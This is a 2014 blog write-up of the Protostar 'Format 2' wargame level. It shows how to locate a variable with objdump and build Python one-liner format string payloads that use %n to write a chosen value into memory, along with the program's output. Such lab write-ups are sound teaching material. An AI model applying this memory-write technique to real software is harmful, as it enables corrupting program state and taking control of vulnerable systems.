Monday, December 22, 2014

Protostar - Format #2


This level moves on from format1 and shows how specific values can be written in memory. (link)

Source Code:


This one looks very similar to the last one except we now have to write a specific value to target.

Same as before, we can get the address of target with objdump:

user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep "target"
080496e4 g     O .bss    00000004              target

Now that we have the correct address, let's try what we had from before, except subsituting in the new address for target:

user@protostar:/opt/protostar/bin$ python -c "print '\xe4\x96\x04\x08' + '%08x.'*3 + '%n'" | /opt/protostar/bin/format2
target is 31 :(

The key to getting it to write the value of your choice is knowing that %n will write the total number of bytes read so far.

If we use the format string "%19x.", this takes up 20 bytes (19 for the value + 1 for the '.' character). If we do that three times + the original 4-byte address, we will have used 64 bytes.

Running that with a %n tagged on the end gives you this:

user@protostar:/opt/protostar/bin$ python -c "print '\xe4\x96\x04\x08' + '%19x.'*3 + '%n'" | /opt/protostar/bin/format2
                200.           b7fd8420.           bffff5e4.
you have modified the target :)


1 comment: